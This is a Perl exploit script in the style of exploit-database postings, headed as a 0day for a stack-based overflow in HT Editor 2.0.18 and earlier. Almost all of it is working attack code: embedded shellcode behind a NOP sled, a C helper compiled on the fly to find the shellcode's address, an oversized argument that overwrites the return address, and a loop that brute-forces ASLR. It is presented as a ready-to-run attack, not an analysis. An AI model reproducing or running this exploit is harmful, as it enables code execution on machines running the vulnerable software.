# Exploit Title: HT Editor File openning Stack Overflow (0day) # Date: March 30th 2011 # Author: ZadYree # Software Link: http://hte.sourceforge.net/downloads.html # Version: <= 2.0.18 # Tested on: Linux/Windows (buffer padding may differ on W32) # CVE : None
#!/usr/bin/perl =head1 TITLE
HT Editor <=2.0.18 0day Stack-Based Overflow Exploit
=head2 SYNOPSIS
my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
=head1 DESCRIPTION
The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.
=head2 AUTHOR
ZadYree ~ 3LRVS Team
=head3 SEE ALSO
ZadYree's blog: z4d.tuxfamily.org
3LRVS blog: 3lrvs.tuxfamily.org
Shellcode based on http://www.shell-storm.org/shellcode/files/shellcode-606.php => Thanks =cut
use strict; use warnings;
use constant SHELLCODE => "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e". "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" . "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" . "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" . "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" . "\x53\x52\x54\x8a\xe2\xce\x81";
use constant NOPZ => ("\x90" x 3000);
$ENV{'TAPZCODE'} = (NOPZ . SHELLCODE);
open(my $fh, ">", "g3tenv.c"); print $fh <<"EOF"; #include <stdio.h> void main() { printf("%x", getenv("TAPZCODE")); } EOF system("gcc g3tenv.c -o g3tenv"); my $retaddr = qx{./g3tenv};
my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
open(my $as, "<", "/proc/sys/kernel/randomize_va_space"); my $status = <$as>; close($as); unless ($status != 0) { unlink("g3tenv.c", "g3tenv"); exec(@$payload); } print "[*]ASLR detected!\012"; print "[*]Bruteforcing ASLR...\012"; while (1) { $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; qx{@$payload}; last unless ($? == 11); } unlink("g3tenv.c", "g3tenv"); die "HAPPY Hacking!";
|